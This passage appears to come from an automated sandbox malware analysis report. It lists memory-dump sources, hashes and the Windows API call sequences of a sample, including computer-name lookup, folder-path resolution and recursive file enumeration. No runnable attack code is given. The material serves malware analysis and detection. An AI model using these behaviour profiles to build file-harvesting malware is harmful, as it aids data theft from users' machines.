                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 8500e4325c0bde2a0846c6bed6f879fb701e3564d5eb8ce8c3f1a04bcadd8f60
                              • Instruction ID: 80c37ca3390054333e0e1c8b48ca64a5d2caa00cd2816a8c1194a5f286a88fe0
                              • Opcode Fuzzy Hash: 8500e4325c0bde2a0846c6bed6f879fb701e3564d5eb8ce8c3f1a04bcadd8f60
                              • Instruction Fuzzy Hash: 50E06D3450030BEBCB08DFA9D888C96FB28FF48740B04D75CE6094B562E774E880CBA9

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2470 5b2a70-5b2ac2 GetProcessHeap RtlAllocateHeap GetComputerNameA 2471 5b2ae4-5b2af9 2470->2471 2472 5b2ac4-5b2ad6 2470->2472
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 005B2A9F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B2AA6
                              • GetComputerNameA.KERNEL32(00000000,00000104), ref: 005B2ABA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 5bb6f1abec14a90f522337e06b54a72fef351a932dcb764469fe8dee20b57aa5
                              • Instruction ID: ed33e76786f4181c707f7150863228414db53e9ff8a13dfa3eb9f5d6fd1fc2cf
                              • Opcode Fuzzy Hash: 5bb6f1abec14a90f522337e06b54a72fef351a932dcb764469fe8dee20b57aa5
                              • Instruction Fuzzy Hash: C301D672A44608ABD710DF99EC49BAAFBBCF744B21F10426AFA15D3780D7785900C7A5
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A2774
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2797
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A27A2
                              • lstrlen.KERNEL32(\*.*), ref: 005A27AD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A27CA
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 005A27D6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A280A
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 005A2826
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: \*.*
                              • API String ID: 2567437900-1173974218
                              • Opcode ID: 2b61a934acd9a257799024a1cf891d0a9bc3782ca2454f34281b9af3f4263be0
                              • Instruction ID: 5f5814baf29f0eae340843cd601952a6e7be9708becd9d486469365d86ef2796
                              • Opcode Fuzzy Hash: 2b61a934acd9a257799024a1cf891d0a9bc3782ca2454f34281b9af3f4263be0
                              • Instruction Fuzzy Hash: 1BA25D7191161BAFCF20AF69CC8EAAE7FB8BF45704F048528F905A7251DB34DD418BA4
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005915E2
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00591619
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059166C
                              • lstrcat.KERNEL32(00000000), ref: 00591676
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005916A2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005916EF
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005916F9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591725
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591775
                              • lstrcat.KERNEL32(00000000), ref: 0059177F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005917AB
                              • lstrcpy.KERNEL32(00000000,?), ref: 005917F3
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005917FE
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591809
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591829
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00591835
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059185B
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00591866
                              • lstrlen.KERNEL32(\*.*), ref: 00591871
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059188E
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 0059189A
                                • Part of subcall function 005B4020: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 005B404D
                                • Part of subcall function 005B4020: lstrcpy.KERNEL32(00000000,?), ref: 005B4082
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005918C3
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059190E
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00591916
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591921
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591941
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 0059194D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591976
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00591981
                              • lstrlen.KERNEL32(005C1D5C), ref: 0059198C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005919AC
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005919B8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005919DE
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005919E9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591A11
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00591A45
                              • StrCmpCA.SHLWAPI(?,005C1D68), ref: 00591A70
                              • StrCmpCA.SHLWAPI(?,005C1D6C), ref: 00591A8A
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00591AC4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591AFB
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00591B03
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591B0E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591B31
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00591B3D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591B69
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00591B74
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591B7F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591BA2
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00591BAE
                              • lstrlen.KERNEL32(?), ref: 00591BBB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591BDB
                              • lstrcat.KERNEL32(00000000,?), ref: 00591BE9
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591BF4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591C14
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00591C20
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591C46
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00591C51
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591C7D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591CE0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00591CEB
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591CF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591D19
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00591D25
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591D4B
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00591D56
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591D61
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591D81
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00591D8D
                              • lstrlen.KERNEL32(?), ref: 00591D9A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591DBA
                              • lstrcat.KERNEL32(00000000,?), ref: 00591DC8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591DF4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591E3E
                              • GetFileAttributesA.KERNEL32(00000000), ref: 00591E45
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00591E9F
                              • lstrlen.KERNEL32(016095F8), ref: 00591EAE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591EDB
                              • lstrcat.KERNEL32(00000000,?), ref: 00591EE3
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591EEE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591F0E
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00591F1A
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591F42
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00591F4D
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591F58
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591F75
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00591F81
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                              • String ID: \*.*
                              • API String ID: 4127656590-1173974218
                              • Opcode ID: 053b7c733e2c8833abca37635209b78261814d2e101768a45ca42a6f1467a455
                              • Instruction ID: 9d761cb49752dcb2cf3414f8b9a1c102180da5b6b61caf81f427880d768e0450
                              • Opcode Fuzzy Hash: 053b7c733e2c8833abca37635209b78261814d2e101768a45ca42a6f1467a455
                              • Instruction Fuzzy Hash: E3924E7191262BABCF21AFA4DD8DAAE7FB9BF44700F044128F905A7251DB34DD41CBA4
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A1C72
                              • lstrlen.KERNEL32(\*.*), ref: 005A1C7D
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1C9F
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 005A1CAB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1CD2
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 005A1CE7
                              • StrCmpCA.SHLWAPI(?,005C1D68), ref: 005A1D07
                              • StrCmpCA.SHLWAPI(?,005C1D6C), ref: 005A1D21
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A1D5F
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A1D92
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1DBA
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A1DC5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1DEC
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A1DFE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1E20
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A1E2C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1E54
                              • lstrlen.KERNEL32(?), ref: 005A1E68
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1E85
                              • lstrcat.KERNEL32(00000000,?), ref: 005A1E93
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1EB9
                              • lstrlen.KERNEL32(01609668), ref: 005A1ECF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1EF9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A1F04
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1F2F
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A1F41
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1F63
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A1F6F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1F98
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1FC5
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A1FD0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1FF7
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A2009
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A202B
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A2037
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2060
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A208F
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A209A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A20C1
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A20D3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A20F5
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A2101
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A212A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2159
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A2164
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A218D
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A21B9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A21D6
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A21E2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2208
                              • lstrlen.KERNEL32(0160DB10), ref: 005A221E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2252
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A2266
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2283
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A228F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A22B5
                              • lstrlen.KERNEL32(0160DC60), ref: 005A22CB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A22FF
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A2313
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2330
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A233C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2362
                              • lstrlen.KERNEL32(015FC088), ref: 005A2378
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A23A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A23AB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A23D6
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A23E8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2407
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A2413
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2438
                              • lstrlen.KERNEL32(?), ref: 005A244C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2470
                              • lstrcat.KERNEL32(00000000,?), ref: 005A247E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A24A3
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A24DF
                              • lstrlen.KERNEL32(0160DAC8), ref: 005A24EE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2516
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A2521
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                              • String ID: \*.*
                              • API String ID: 712834838-1173974218
                              • Opcode ID: b6017a0c797a0ee85154f50f7da3a4b6dd954de411ea82f81da48f15b0abb96f
                              • Instruction ID: 253a84ba4109bb777428efd23ccd8cc8785a66e27f0a09bab537e22011f98d46
                              • Opcode Fuzzy Hash: b6017a0c797a0ee85154f50f7da3a4b6dd954de411ea82f81da48f15b0abb96f
                              • Instruction Fuzzy Hash: F9626F3191261BABCB21AF68DC4EAAF7FB9BF85700F044528F90597261DB34DD41CBA4
                              APIs
                              • wsprintfA.USER32 ref: 005A3CDC
                              • FindFirstFileA.KERNEL32(?,?), ref: 005A3CF3
                              • StrCmpCA.SHLWAPI(?,005C1D68), ref: 005A3D1C
                              • StrCmpCA.SHLWAPI(?,005C1D6C), ref: 005A3D36
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A3D6F
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A3D97
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A3DA2
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A3DAD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A3DCA
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A3DD6
                              • lstrlen.KERNEL32(?), ref: 005A3DE3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A3E03
                              • lstrcat.KERNEL32(00000000,?), ref: 005A3E11
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A3E3A
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A3E7E
                              • lstrlen.KERNEL32(?), ref: 005A3E88
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A3EB5
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A3EC0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A3EE6
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A3EF8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A3F1A
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A3F26
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A3F4E
                              • lstrlen.KERNEL32(?), ref: 005A3F62
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A3F82
                              • lstrcat.KERNEL32(00000000,?), ref: 005A3F90
                              • lstrlen.KERNEL32(016095F8), ref: 005A3FBB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A3FE1
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A3FEC
                              • lstrlen.KERNEL32(01609668), ref: 005A400E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4034
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A403F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4067
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A4079
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4098
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A40A4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A40CA
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A40F7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A4102
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4129
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A413B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A415D
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A4169
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4192
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A41C1
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A41CC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A41F3
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A4205
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4227
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A4233
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A425C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A428B
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A4296
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A42BD
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A42CF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A42F1
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A42FD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4325
                              • lstrlen.KERNEL32(?), ref: 005A4339
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4359
                              • lstrcat.KERNEL32(00000000,?), ref: 005A4367
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4390
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A43CF
                              • lstrlen.KERNEL32(0160DAC8), ref: 005A43DE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4406
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A4411
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A443A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A447E
                              • lstrcat.KERNEL32(00000000), ref: 005A448B
                              • FindNextFileA.KERNEL32(00000000,?), ref: 005A4689
                              • FindClose.KERNEL32(00000000), ref: 005A4698
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 1006159827-1013718255
                              • Opcode ID: 1479f6931c5ce7400466bf38f8c289cb52de2d3e676cb13c028d1a165755fc27
